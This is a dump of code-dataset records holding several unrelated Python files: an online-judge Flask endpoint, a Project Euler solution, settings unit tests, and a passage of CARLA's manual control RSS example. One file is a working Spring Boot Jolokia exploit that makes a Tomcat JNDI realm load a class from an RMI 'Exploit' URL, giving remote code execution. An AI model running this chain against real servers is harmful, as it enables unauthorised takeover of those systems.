hexsha: stringlengths 40–40 | size: int64 (6–782k) | ext: stringclasses (7 values) | lang: stringclasses (1 value) | max_stars_repo_path: stringlengths 4–237 | max_stars_repo_name: stringlengths 6–72 | max_stars_repo_head_hexsha: stringlengths 40–40 | max_stars_repo_licenses: list | max_stars_count: int64 (1–53k) ⌀ | max_stars_repo_stars_event_min_datetime: stringlengths 24–24 ⌀ | max_stars_repo_stars_event_max_datetime: stringlengths 24–24 ⌀ | max_issues_repo_path: stringlengths 4–184 | max_issues_repo_name: stringlengths 6–72 | max_issues_repo_head_hexsha: stringlengths 40–40 | max_issues_repo_licenses: list | max_issues_count: int64 (1–27.1k) ⌀ | max_issues_repo_issues_event_min_datetime: stringlengths 24–24 ⌀ | max_issues_repo_issues_event_max_datetime: stringlengths 24–24 ⌀ | max_forks_repo_path: stringlengths 4–184 | max_forks_repo_name: stringlengths 6–72 | max_forks_repo_head_hexsha: stringlengths 40–40 | max_forks_repo_licenses: list | max_forks_count: int64 (1–12.2k) ⌀ | max_forks_repo_forks_event_min_datetime: stringlengths 24–24 ⌀ | max_forks_repo_forks_event_max_datetime: stringlengths 24–24 ⌀ | content: stringlengths 6–782k | avg_line_length: float64 (2.75–664k) | max_line_length: int64 (5–782k) | alphanum_fraction: float64 (0–1)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e7a5b19efaed8d0261913c25357b701ba96f3c7a | 2,691 | py | Python | app/judgement/views.py | pushyzheng/docker-oj-web | 119abae3763cd2e53c686a320af7f4f5af1f16ca | ["MIT"] | 2 | 2019-06-24T08:34:39.000Z | 2019-06-27T12:23:47.000Z | app/judgement/views.py | pushyzheng/docker-oj-web | 119abae3763cd2e53c686a320af7f4f5af1f16ca | ["MIT"] | null | null | null | app/judgement/views.py | pushyzheng/docker-oj-web | 119abae3763cd2e53c686a320af7f4f5af1f16ca | ["MIT"] | null | null | null |
# encoding:utf-8
from app import app, rabbitmq, db
from app.common.models import RoleName
from app.problem.models import Problem
from app.submission.models import Submission
from app.judgement.models import JudgementTask
from app.auth.main import auth
from utils import get_uuid, logger
import os
import re
from flask import jsonify, g, abort
from flask_expects_json import expects_json
judge_schema = {
'type': 'object',
'properties': {
'code': {'type': 'string'},
'language': {'type': 'string'},
'problem_id': {'type': 'integer'}
},
'required': ['code', 'language', 'problem_id']
}
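# Example request body accepted by judge_schema (the values here are
# illustrative, not taken from the project):
#   POST /judge
#   {"code": "print(1)", "language": "python", "problem_id": 1}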
@app.route('/judge', methods=['POST'])
@auth(role=RoleName.USER)
@expects_json(judge_schema)
def judge():
user_id = g.user.id
data = g.data
code = data['code']
language = data['language']
problem_id = data['problem_id']
problem = Problem.query.filter_by(id=problem_id).first()
if not problem:
        return jsonify(data=None, message='Problem not found'), 404
    if language == 'java':
        ok, info = valid_java_format(code)
        if not ok:
            return jsonify(data=None, message=info), 400
user_path = 'e:/usr/pushy/{}'.format(user_id)
if not os.path.exists(user_path):
os.mkdir(user_path)
with open('{}/{}'.format(user_path, get_file_name(language)), 'w', encoding='utf-8') as f:
f.write(code)
task_id = get_uuid()
task = JudgementTask(
task_id=task_id,
problem_id=problem_id,
user_id=user_id,
language=language,
time_limit=problem.time_limit,
memory_limit=problem.memory_limit
)
submission = Submission(
id=task_id,
user_id=user_id,
problem_id=problem_id,
language=language,
code=code
)
resp = submission.to_dict()
db.session.add(submission)
db.session.commit()
logger.info("Send task => {}".format(task))
rabbitmq.send(body=task.to_json_string(), exchange='', key='go-docker-judger')
return jsonify(data=resp), 202
def get_file_name(language):
    if language == 'java':
        return 'Main.java'
    if language == 'c':
        return 'main.c'
    if language == 'cpp':
        return 'main.cpp'
    if language == 'python':
        return 'main.py'
    if language == 'js':
        return 'main.js'
    # Fail loudly instead of silently returning None for unknown languages
    raise ValueError('Unsupported language: {}'.format(language))
def valid_java_format(code):
    if code.find('package') != -1:
        return False, 'Please remove the package declaration (package xxx)'
    res = re.findall('public class (.*?)?{', code)
    if len(res) == 0:
        return False, 'The main class must be named Main'
    class_name = res[0].strip()
    if class_name != 'Main':
        return False, 'The main class must be named Main'
    # Return a tuple on success as well, so callers can always unpack it
    return True, None
| 25.628571 | 94 | 0.625418 |
82172256f79551778bd0128f55c1b611129308ef | 400 | py | Python | euler-56.py | TFabijo/euler2 | 7da205ce02ae3bd12754f99c1fe69fbf20b1e3d0 | ["MIT"] | null | null | null | euler-56.py | TFabijo/euler2 | 7da205ce02ae3bd12754f99c1fe69fbf20b1e3d0 | ["MIT"] | null | null | null | euler-56.py | TFabijo/euler2 | 7da205ce02ae3bd12754f99c1fe69fbf20b1e3d0 | ["MIT"] | null | null | null |
def vsota_stevk(n):
s = str(n)
vsota = 0
for x in s:
vsota += int(x)
return vsota
def euler56():
najvecja_vsota = 0
for a in range(1,100):
for b in range(1,100):
st = a ** b
s = vsota_stevk(st)
if s > najvecja_vsota:
najvecja_vsota = s
return najvecja_vsota
print(euler56())  # maximum digit sum of a**b for a, b < 100
| 19.047619 | 35 | 0.4625 |
4189e25901e65fdfb202785ad80b92ca2da7e587 | 1,187 | py | Python | springboot-jolokia-realm/springboot-realm-jndi-rce.py | hex0wn/learn-java-bug | bf191905ba4c284d90e8eb51ec2806ce5b9139dd | ["MIT"] | 61 | 2020-07-02T04:30:23.000Z | 2022-03-23T10:11:17.000Z | springboot-jolokia-realm/springboot-realm-jndi-rce.py | hex0wn/learn-java-bug | bf191905ba4c284d90e8eb51ec2806ce5b9139dd | ["MIT"] | 18 | 2020-07-30T08:00:06.000Z | 2022-02-01T01:06:54.000Z | springboot-jolokia-realm/springboot-realm-jndi-rce.py | hex0wn/learn-java-bug | bf191905ba4c284d90e8eb51ec2806ce5b9139dd | ["MIT"] | 10 | 2020-07-03T09:12:55.000Z | 2022-03-09T11:13:56.000Z |
#!/usr/bin/env python3
# coding: utf-8
# Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txt
import requests
import json
url = 'http://127.0.0.1:8080/actuator/jolokia'
#url = 'http://127.0.0.1:8080/jolokia'
jndi = 'rmi://localhost:1099/Exploit'
create_realm = {
"mbean": "Tomcat:type=MBeanFactory",
"type": "EXEC",
"operation": "createJNDIRealm",
"arguments": ["Tomcat:type=Engine"]
}
write_factory = {
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "WRITE",
"attribute": "contextFactory",
"value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
}
write_url = {
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "WRITE",
"attribute": "connectionURL",
"value": jndi
}
stop = {
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "EXEC",
"operation": "stop",
"arguments": []
}
start = {
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "EXEC",
"operation": "start",
"arguments": []
}
flow = [create_realm, write_factory, write_url, stop, start]
r = requests.post(url, json=flow)
print(r.status_code)
results = r.json()
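# Sketch (assumption): Jolokia answers a bulk request with a JSON array
# holding one response object per operation; a "status" of 200 means the
# operation succeeded.
for step, result in zip(flow, results):
    op = step.get("operation") or step.get("attribute")
    print("{} -> {}".format(op, result.get("status")))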
| 21.581818 | 111 | 0.641955 |
ec38d9d24cd534832a026c3239e7fd11542cf1da | 4,475 | py | Python | Tests/test_settings.py | dereklm12880/rssticker | d90e8c00811d67bd9fb8104bbb6ec98aae5221f4 | ["MIT"] | 2 | 2020-02-26T01:54:26.000Z | 2020-04-27T20:09:14.000Z | Tests/test_settings.py | dereklm12880/rssticker | d90e8c00811d67bd9fb8104bbb6ec98aae5221f4 | ["MIT"] | 17 | 2020-02-29T02:43:44.000Z | 2020-04-27T20:38:44.000Z | Tests/test_settings.py | dereklm12880/rssticker | d90e8c00811d67bd9fb8104bbb6ec98aae5221f4 | ["MIT"] | 8 | 2020-02-26T21:37:36.000Z | 2020-06-23T00:01:27.000Z |
import os
import unittest
from unittest import mock
import yaml
from mock import patch
from RSS.model.settings import SettingsModel
import builtins
class TestRssSettings(unittest.TestCase):
"""Test class for RSS.model.settings.SettingsModel."""
_return_value = {"feeds": ["http://fakefeed.com", "http://anotherfakefeed.com"]}
_mock_open = mock.mock_open(read_data='')
def test_load_settings_no_file(self):
""" Unit test for RSS.model.settings.SettingsModel.load_settings.
Tests to make sure that the .yaml file exists.
"""
with patch.object(yaml, 'load', return_value=self._return_value) as mock_method:
with self.assertRaises(Exception):
_settings = SettingsModel()
_settings.filename = 'ghost_file.yaml'
_settings.load_settings()
def test_load_settings(self):
""" Unit test for RSS.model.settings.SettingsModel.next_url.
Tests to check feeds in yaml file that can be loaded.
"""
with patch.object(yaml, 'load', return_value=self._return_value) as mock_method:
with mock.patch('builtins.open', self._mock_open):
_settings = SettingsModel()
_settings.filename = 'dummy.yaml'
_loaded_settings = _settings.load_settings().settings
assert _loaded_settings['feeds'] == self._return_value['feeds']
def test_save_settings(self):
""" Unit test for RSS.model.settings.SettingsModel.save_settings.
        Tests that a dictionary of configurable values is written to the yaml file.
"""
_settings = SettingsModel()
_settings.filename = 'dummy_.yaml'
_settings.save_settings(self._return_value)
assert _settings.load_settings().settings['feeds'] == self._return_value['feeds']
os.remove(_settings.filename)
def test_save_settings_again(self):
""" Unit test for RSS.model.settings.SettingsModel.save_settings.
        Tests that a dictionary of configurable values is written to the yaml file.
"""
_settings = SettingsModel()
_settings.filename = 'dummy_.yaml'
_settings.settings = self._return_value
_settings.save_settings()
assert _settings.load_settings().settings['feeds'] == self._return_value['feeds']
os.remove(_settings.filename)
def test_save_settings_fail_set_via_settings_class_member(self):
""" Unit test for RSS.model.settings.SettingsModel.save_settings.
        Tests that the function throws an exception because the settings class member is not a dictionary.
"""
_settings = SettingsModel()
_settings.filename = 'dummy_.yaml'
_settings.settings = 'Bob dole was here'
with self.assertRaises(Exception):
_settings.save_settings()
def test_save_settings_fail_set_via_argument(self):
""" Unit test for RSS.model.settings.SettingsModel.save_settings.
        Tests that the function throws an exception because the argument is invalid.
"""
_settings = SettingsModel()
_settings.filename = 'dummy_.yaml'
with self.assertRaises(Exception):
_settings.save_settings(12345)
def test_next_url(self):
""" Unit test for RSS.model.settings.SettingsModel.next_url.
        Tests to assert that there are valid feeds in the yaml file.
"""
with patch.object(yaml, 'load', return_value=self._return_value) as mock_method:
_settings = SettingsModel()
_settings.filename = 'dummy.yaml'
_settings.load_settings()
_url = _settings.next_url()
assert _url == 'http://fakefeed.com'
_url = _settings.next_url()
assert _url == 'http://anotherfakefeed.com'
_url = _settings.next_url()
assert _url == 'http://fakefeed.com'
def test_next_url_with_exception(self):
""" Unit test for RSS.model.settings.SettingsModel.next_url.
        Tests that the function throws an exception when the return value is empty.
"""
with patch.object(yaml, 'load', return_value={}) as mock_method:
_settings = SettingsModel()
_settings.filename = 'dummy.yaml'
_settings.load_settings()
with self.assertRaises(Exception):
_url = _settings.next_url()
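if __name__ == '__main__':
    # Allows running this test file directly (a sketch; the project may
    # use a different test runner):
    unittest.main()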
| 37.605042 | 97 | 0.653184 |
ec563901f108bd7ef469d7f45cba82dd666cd850 | 37,134 | py | Python | PythonAPI/examples/rss/manual_control_rss.py | cpc/carla | 2b4af4c08c751461e23558809a1d8dcb5dc740dc | ["MIT"] | 7,883 | 2017-11-10T16:49:23.000Z | 2022-03-31T18:48:47.000Z | PythonAPI/examples/rss/manual_control_rss.py | cpc/carla | 2b4af4c08c751461e23558809a1d8dcb5dc740dc | ["MIT"] | 4,558 | 2017-11-10T17:45:30.000Z | 2022-03-31T23:30:02.000Z | PythonAPI/examples/rss/manual_control_rss.py | cpc/carla | 2b4af4c08c751461e23558809a1d8dcb5dc740dc | ["MIT"] | 2,547 | 2017-11-13T03:22:44.000Z | 2022-03-31T10:39:30.000Z |
#!/usr/bin/env python
# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
# Copyright (c) 2019-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
# Allows controlling a vehicle with a keyboard. For a simpler and more
# documented example, please take a look at tutorial.py.
"""
Welcome to CARLA manual control.
Use ARROWS or WASD keys for control.
W : throttle
S : brake
AD : steer
Q : toggle reverse
Space : hand-brake
P : toggle autopilot
TAB : change view
Backspace : change vehicle
R : toggle recording images to disk
F2 : toggle RSS visualization mode
B : toggle RSS Road Boundaries Mode
G : RSS check drop current route
T : toggle RSS
N : pause simulation
F1 : toggle HUD
H/? : toggle help
ESC : quit
"""
from __future__ import print_function
# ==============================================================================
# -- find carla module ---------------------------------------------------------
# ==============================================================================
import glob
import os
import sys
import signal
try:
sys.path.append(glob.glob(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + '/carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
# ==============================================================================
# -- imports -------------------------------------------------------------------
# ==============================================================================
import carla
from carla import ColorConverter as cc
import argparse
import logging
import math
import random
import weakref
from rss_sensor import RssSensor # pylint: disable=relative-import
from rss_visualization import RssUnstructuredSceneVisualizer, RssBoundingBoxVisualizer, RssStateVisualizer # pylint: disable=relative-import
try:
import pygame
from pygame.locals import KMOD_CTRL
from pygame.locals import KMOD_SHIFT
from pygame.locals import K_BACKSPACE
from pygame.locals import K_TAB
from pygame.locals import K_DOWN
from pygame.locals import K_ESCAPE
from pygame.locals import K_F1
from pygame.locals import K_F2
from pygame.locals import K_LEFT
from pygame.locals import K_RIGHT
from pygame.locals import K_SLASH
from pygame.locals import K_SPACE
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_b
from pygame.locals import K_d
from pygame.locals import K_g
from pygame.locals import K_h
from pygame.locals import K_n
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_r
from pygame.locals import K_s
from pygame.locals import K_w
from pygame.locals import K_l
from pygame.locals import K_i
from pygame.locals import K_z
from pygame.locals import K_x
from pygame.locals import MOUSEBUTTONDOWN
from pygame.locals import MOUSEBUTTONUP
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
try:
import numpy as np
except ImportError:
raise RuntimeError('cannot import numpy, make sure numpy package is installed')
# ==============================================================================
# -- World ---------------------------------------------------------------------
# ==============================================================================
class World(object):
def __init__(self, carla_world, args):
self.world = carla_world
self.actor_role_name = args.rolename
self.dim = (args.width, args.height)
try:
self.map = self.world.get_map()
except RuntimeError as error:
print('RuntimeError: {}'.format(error))
print(' The server could not send the OpenDRIVE (.xodr) file:')
print(' Make sure it exists, has the same name of your town, and is correct.')
sys.exit(1)
self.external_actor = args.externalActor
self.hud = HUD(args.width, args.height, carla_world)
self.recording_frame_num = 0
self.recording = False
self.recording_dir_num = 0
self.player = None
self.actors = []
self.rss_sensor = None
self.rss_unstructured_scene_visualizer = None
self.rss_bounding_box_visualizer = None
self._actor_filter = args.filter
if not self._actor_filter.startswith("vehicle."):
print('Error: RSS only supports vehicles as ego.')
sys.exit(1)
self.restart()
self.world_tick_id = self.world.on_tick(self.on_world_tick)
def on_world_tick(self, world_snapshot):
self.hud.on_world_tick(world_snapshot)
def toggle_pause(self):
settings = self.world.get_settings()
self.pause_simulation(not settings.synchronous_mode)
def pause_simulation(self, pause):
settings = self.world.get_settings()
if pause and not settings.synchronous_mode:
settings.synchronous_mode = True
settings.fixed_delta_seconds = 0.05
self.world.apply_settings(settings)
elif not pause and settings.synchronous_mode:
settings.synchronous_mode = False
settings.fixed_delta_seconds = None
self.world.apply_settings(settings)
def restart(self):
if self.external_actor:
# Check whether there is already an actor with defined role name
for actor in self.world.get_actors():
if actor.attributes.get('role_name') == self.actor_role_name:
self.player = actor
break
else:
# Get a random blueprint.
blueprint = random.choice(self.world.get_blueprint_library().filter(self._actor_filter))
blueprint.set_attribute('role_name', self.actor_role_name)
if blueprint.has_attribute('color'):
color = random.choice(blueprint.get_attribute('color').recommended_values)
blueprint.set_attribute('color', color)
if blueprint.has_attribute('driver_id'):
driver_id = random.choice(blueprint.get_attribute('driver_id').recommended_values)
blueprint.set_attribute('driver_id', driver_id)
if blueprint.has_attribute('is_invincible'):
blueprint.set_attribute('is_invincible', 'true')
# Spawn the player.
if self.player is not None:
spawn_point = self.player.get_transform()
spawn_point.location.z += 2.0
spawn_point.rotation.roll = 0.0
spawn_point.rotation.pitch = 0.0
self.destroy()
self.player = self.world.try_spawn_actor(blueprint, spawn_point)
while self.player is None:
if not self.map.get_spawn_points():
print('There are no spawn points available in your map/town.')
print('Please add some Vehicle Spawn Point to your UE4 scene.')
sys.exit(1)
spawn_points = self.map.get_spawn_points()
spawn_point = random.choice(spawn_points) if spawn_points else carla.Transform()
self.player = self.world.try_spawn_actor(blueprint, spawn_point)
if self.external_actor:
ego_sensors = []
for actor in self.world.get_actors():
if actor.parent == self.player:
ego_sensors.append(actor)
for ego_sensor in ego_sensors:
if ego_sensor is not None:
ego_sensor.destroy()
# Set up the sensors.
self.camera = Camera(self.player, self.dim)
self.rss_unstructured_scene_visualizer = RssUnstructuredSceneVisualizer(self.player, self.world, self.dim)
self.rss_bounding_box_visualizer = RssBoundingBoxVisualizer(self.dim, self.world, self.camera.sensor)
self.rss_sensor = RssSensor(self.player, self.world,
self.rss_unstructured_scene_visualizer, self.rss_bounding_box_visualizer, self.hud.rss_state_visualizer)
def tick(self, clock):
self.hud.tick(self.player, clock)
def toggle_recording(self):
if not self.recording:
dir_name = "_out%04d" % self.recording_dir_num
while os.path.exists(dir_name):
self.recording_dir_num += 1
dir_name = "_out%04d" % self.recording_dir_num
self.recording_frame_num = 0
os.mkdir(dir_name)
else:
self.hud.notification('Recording finished (folder: _out%04d)' % self.recording_dir_num)
self.recording = not self.recording
def render(self, display):
self.camera.render(display)
self.rss_bounding_box_visualizer.render(display, self.camera.current_frame)
self.rss_unstructured_scene_visualizer.render(display)
self.hud.render(display)
if self.recording:
pygame.image.save(display, "_out%04d/%08d.bmp" % (self.recording_dir_num, self.recording_frame_num))
self.recording_frame_num += 1
def destroy(self):
# stop from ticking
if self.world_tick_id:
self.world.remove_on_tick(self.world_tick_id)
if self.camera:
self.camera.destroy()
if self.rss_sensor:
self.rss_sensor.destroy()
if self.rss_unstructured_scene_visualizer:
self.rss_unstructured_scene_visualizer.destroy()
if self.player:
self.player.destroy()
# ==============================================================================
# -- Camera --------------------------------------------------------------------
# ==============================================================================
class Camera(object):
def __init__(self, parent_actor, display_dimensions):
self.surface = None
self._parent = parent_actor
self.current_frame = None
bp_library = self._parent.get_world().get_blueprint_library()
bp = bp_library.find('sensor.camera.rgb')
bp.set_attribute('image_size_x', str(display_dimensions[0]))
bp.set_attribute('image_size_y', str(display_dimensions[1]))
self.sensor = self._parent.get_world().spawn_actor(bp, carla.Transform(carla.Location(
x=-5.5, z=2.5), carla.Rotation(pitch=8.0)), attach_to=self._parent, attachment_type=carla.AttachmentType.SpringArm)
# We need to pass the lambda a weak reference to self to avoid
# circular reference.
weak_self = weakref.ref(self)
self.sensor.listen(lambda image: Camera._parse_image(weak_self, image))
def destroy(self):
self.sensor.stop()
self.sensor.destroy()
self.sensor = None
def render(self, display):
if self.surface is not None:
display.blit(self.surface, (0, 0))
@staticmethod
def _parse_image(weak_self, image):
self = weak_self()
if not self:
return
self.current_frame = image.frame
image.convert(cc.Raw)
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self.surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
# ==============================================================================
# -- VehicleControl -----------------------------------------------------------
# ==============================================================================
class VehicleControl(object):
MOUSE_STEERING_RANGE = 200
signal_received = False
"""Class that handles keyboard input."""
def __init__(self, world, start_in_autopilot):
self._autopilot_enabled = start_in_autopilot
self._world = world
self._control = carla.VehicleControl()
self._lights = carla.VehicleLightState.NONE
world.player.set_autopilot(self._autopilot_enabled)
self._restrictor = carla.RssRestrictor()
self._vehicle_physics = world.player.get_physics_control()
world.player.set_light_state(self._lights)
self._steer_cache = 0.0
self._mouse_steering_center = None
self._surface = pygame.Surface((self.MOUSE_STEERING_RANGE * 2, self.MOUSE_STEERING_RANGE * 2))
self._surface.set_colorkey(pygame.Color('black'))
self._surface.set_alpha(60)
line_width = 2
pygame.draw.polygon(self._surface,
(0, 0, 255),
[
(0, 0),
(0, self.MOUSE_STEERING_RANGE * 2 - line_width),
(self.MOUSE_STEERING_RANGE * 2 - line_width,
self.MOUSE_STEERING_RANGE * 2 - line_width),
(self.MOUSE_STEERING_RANGE * 2 - line_width, 0),
(0, 0)
], line_width)
pygame.draw.polygon(self._surface,
(0, 0, 255),
[
(0, self.MOUSE_STEERING_RANGE),
(self.MOUSE_STEERING_RANGE * 2, self.MOUSE_STEERING_RANGE)
], line_width)
pygame.draw.polygon(self._surface,
(0, 0, 255),
[
(self.MOUSE_STEERING_RANGE, 0),
(self.MOUSE_STEERING_RANGE, self.MOUSE_STEERING_RANGE * 2)
], line_width)
world.hud.notification("Press 'H' or '?' for help.", seconds=4.0)
def render(self, display):
if self._mouse_steering_center:
display.blit(
self._surface, (self._mouse_steering_center[0] - self.MOUSE_STEERING_RANGE, self._mouse_steering_center[1] - self.MOUSE_STEERING_RANGE))
@staticmethod
def signal_handler(signum, _):
print('\nReceived signal {}. Trigger stopping...'.format(signum))
VehicleControl.signal_received = True
def parse_events(self, world, clock):
if VehicleControl.signal_received:
print('\nAccepted signal. Stopping loop...')
return True
if isinstance(self._control, carla.VehicleControl):
current_lights = self._lights
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
elif event.type == pygame.KEYUP:
if self._is_quit_shortcut(event.key):
return True
elif event.key == K_BACKSPACE:
if self._autopilot_enabled:
world.player.set_autopilot(False)
world.restart()
world.player.set_autopilot(True)
else:
world.restart()
elif event.key == K_F1:
world.hud.toggle_info()
elif event.key == K_h or (event.key == K_SLASH and pygame.key.get_mods() & KMOD_SHIFT):
world.hud.help.toggle()
elif event.key == K_TAB:
world.rss_unstructured_scene_visualizer.toggle_camera()
elif event.key == K_n:
world.toggle_pause()
elif event.key == K_r:
world.toggle_recording()
elif event.key == K_F2:
if self._world and self._world.rss_sensor:
self._world.rss_sensor.toggle_debug_visualization_mode()
elif event.key == K_b:
if self._world and self._world.rss_sensor:
if self._world.rss_sensor.sensor.road_boundaries_mode == carla.RssRoadBoundariesMode.Off:
self._world.rss_sensor.sensor.road_boundaries_mode = carla.RssRoadBoundariesMode.On
print("carla.RssRoadBoundariesMode.On")
else:
self._world.rss_sensor.sensor.road_boundaries_mode = carla.RssRoadBoundariesMode.Off
print("carla.RssRoadBoundariesMode.Off")
elif event.key == K_g:
if self._world and self._world.rss_sensor:
self._world.rss_sensor.drop_route()
if isinstance(self._control, carla.VehicleControl):
if event.key == K_q:
self._control.gear = 1 if self._control.reverse else -1
elif event.key == K_p and not pygame.key.get_mods() & KMOD_CTRL:
self._autopilot_enabled = not self._autopilot_enabled
world.player.set_autopilot(self._autopilot_enabled)
world.hud.notification(
'Autopilot %s' % ('On' if self._autopilot_enabled else 'Off'))
elif event.key == K_l and pygame.key.get_mods() & KMOD_CTRL:
current_lights ^= carla.VehicleLightState.Special1
elif event.key == K_l and pygame.key.get_mods() & KMOD_SHIFT:
current_lights ^= carla.VehicleLightState.HighBeam
elif event.key == K_l:
# Use 'L' key to switch between lights:
# closed -> position -> low beam -> fog
if not self._lights & carla.VehicleLightState.Position:
world.hud.notification("Position lights")
current_lights |= carla.VehicleLightState.Position
else:
world.hud.notification("Low beam lights")
current_lights |= carla.VehicleLightState.LowBeam
if self._lights & carla.VehicleLightState.LowBeam:
world.hud.notification("Fog lights")
current_lights |= carla.VehicleLightState.Fog
if self._lights & carla.VehicleLightState.Fog:
world.hud.notification("Lights off")
current_lights ^= carla.VehicleLightState.Position
current_lights ^= carla.VehicleLightState.LowBeam
current_lights ^= carla.VehicleLightState.Fog
elif event.key == K_i:
current_lights ^= carla.VehicleLightState.Interior
elif event.key == K_z:
current_lights ^= carla.VehicleLightState.LeftBlinker
elif event.key == K_x:
current_lights ^= carla.VehicleLightState.RightBlinker
elif event.type == MOUSEBUTTONDOWN:
# store current mouse position for mouse-steering
if event.button == 1:
self._mouse_steering_center = event.pos
elif event.type == MOUSEBUTTONUP:
if event.button == 1:
self._mouse_steering_center = None
if not self._autopilot_enabled:
prev_steer_cache = self._steer_cache
self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
if pygame.mouse.get_pressed()[0]:
self._parse_mouse(pygame.mouse.get_pos())
self._control.reverse = self._control.gear < 0
vehicle_control = self._control
world.hud.original_vehicle_control = vehicle_control
world.hud.restricted_vehicle_control = vehicle_control
# limit speed to 30kmh
v = self._world.player.get_velocity()
if (3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2)) > 30.0:
self._control.throttle = 0
# if self._world.rss_sensor and self._world.rss_sensor.ego_dynamics_on_route and not self._world.rss_sensor.ego_dynamics_on_route.ego_center_within_route:
# print ("Not on route!" + str(self._world.rss_sensor.ego_dynamics_on_route))
if self._restrictor:
rss_proper_response = self._world.rss_sensor.proper_response if self._world.rss_sensor and self._world.rss_sensor.response_valid else None
if rss_proper_response:
if not (pygame.key.get_mods() & KMOD_CTRL):
vehicle_control = self._restrictor.restrict_vehicle_control(
vehicle_control, rss_proper_response, self._world.rss_sensor.ego_dynamics_on_route, self._vehicle_physics)
world.hud.restricted_vehicle_control = vehicle_control
world.hud.allowed_steering_ranges = self._world.rss_sensor.get_steering_ranges()
if world.hud.original_vehicle_control.steer != world.hud.restricted_vehicle_control.steer:
self._steer_cache = prev_steer_cache
# Set automatic control-related vehicle lights
if vehicle_control.brake:
current_lights |= carla.VehicleLightState.Brake
else: # Remove the Brake flag
current_lights &= carla.VehicleLightState.All ^ carla.VehicleLightState.Brake
if vehicle_control.reverse:
current_lights |= carla.VehicleLightState.Reverse
else: # Remove the Reverse flag
current_lights &= carla.VehicleLightState.All ^ carla.VehicleLightState.Reverse
if current_lights != self._lights: # Change the light state only if necessary
self._lights = current_lights
world.player.set_light_state(carla.VehicleLightState(self._lights))
world.player.apply_control(vehicle_control)
def _parse_vehicle_keys(self, keys, milliseconds):
if keys[K_UP] or keys[K_w]:
self._control.throttle = min(self._control.throttle + 0.2, 1)
else:
self._control.throttle = max(self._control.throttle - 0.2, 0)
if keys[K_DOWN] or keys[K_s]:
self._control.brake = min(self._control.brake + 0.2, 1)
else:
self._control.brake = max(self._control.brake - 0.2, 0)
steer_increment = 5e-4 * milliseconds
if keys[K_LEFT] or keys[K_a]:
if self._steer_cache > 0:
self._steer_cache = 0
else:
self._steer_cache -= steer_increment
elif keys[K_RIGHT] or keys[K_d]:
if self._steer_cache < 0:
self._steer_cache = 0
else:
self._steer_cache += steer_increment
elif self._steer_cache > 0:
self._steer_cache = max(self._steer_cache - steer_increment, 0.0)
elif self._steer_cache < 0:
self._steer_cache = min(self._steer_cache + steer_increment, 0.0)
else:
self._steer_cache = 0
self._steer_cache = min(1.0, max(-1.0, self._steer_cache))
self._control.steer = round(self._steer_cache, 1)
self._control.hand_brake = keys[K_SPACE]
def _parse_mouse(self, pos):
if not self._mouse_steering_center:
return
lateral = float(pos[0] - self._mouse_steering_center[0])
longitudinal = float(pos[1] - self._mouse_steering_center[1])
max_val = self.MOUSE_STEERING_RANGE
lateral = -max_val if lateral < -max_val else max_val if lateral > max_val else lateral
longitudinal = -max_val if longitudinal < -max_val else max_val if longitudinal > max_val else longitudinal
self._control.steer = lateral / max_val
if longitudinal < 0.0:
self._control.throttle = -longitudinal / max_val
self._control.brake = 0.0
elif longitudinal > 0.0:
self._control.throttle = 0.0
self._control.brake = longitudinal / max_val
@staticmethod
def _is_quit_shortcut(key):
return (key == K_ESCAPE) or (key == K_q and pygame.key.get_mods() & KMOD_CTRL)
# ==============================================================================
# -- HUD -----------------------------------------------------------------------
# ==============================================================================
class HUD(object):
def __init__(self, width, height, world):
self.dim = (width, height)
self._world = world
self.map_name = world.get_map().name
font = pygame.font.Font(pygame.font.get_default_font(), 20)
font_name = 'courier' if os.name == 'nt' else 'mono'
fonts = [x for x in pygame.font.get_fonts() if font_name in x]
default_font = 'ubuntumono'
mono = default_font if default_font in fonts else fonts[0]
mono = pygame.font.match_font(mono)
self._font_mono = pygame.font.Font(mono, 12 if os.name == 'nt' else 14)
self._notifications = FadingText(font, (width, 40), (0, height - 40))
self.help = HelpText(pygame.font.Font(mono, 16), width, height)
self.server_fps = 0
self.frame = 0
self.simulation_time = 0
self.original_vehicle_control = None
self.restricted_vehicle_control = None
self.allowed_steering_ranges = []
self._show_info = True
self._info_text = []
self._server_clock = pygame.time.Clock()
self.rss_state_visualizer = RssStateVisualizer(self.dim, self._font_mono, self._world)
def on_world_tick(self, timestamp):
self._server_clock.tick()
self.server_fps = self._server_clock.get_fps()
self.frame = timestamp.frame
self.simulation_time = timestamp.elapsed_seconds
def tick(self, player, clock):
self._notifications.tick(clock)
if not self._show_info:
return
t = player.get_transform()
v = player.get_velocity()
c = player.get_control()
self._info_text = [
'Server: % 16.0f FPS' % self.server_fps,
'Client: % 16.0f FPS' % clock.get_fps(),
'Map: % 20s' % self.map_name,
'',
'Speed: % 15.0f km/h' % (3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2)),
'Location:% 20s' % ('(% 5.1f, % 5.1f)' % (t.location.x, t.location.y)),
'Heading: % 20.2f' % math.radians(t.rotation.yaw),
'']
if self.original_vehicle_control:
orig_control = self.original_vehicle_control
restricted_control = self.restricted_vehicle_control
allowed_steering_ranges = self.allowed_steering_ranges
self._info_text += [
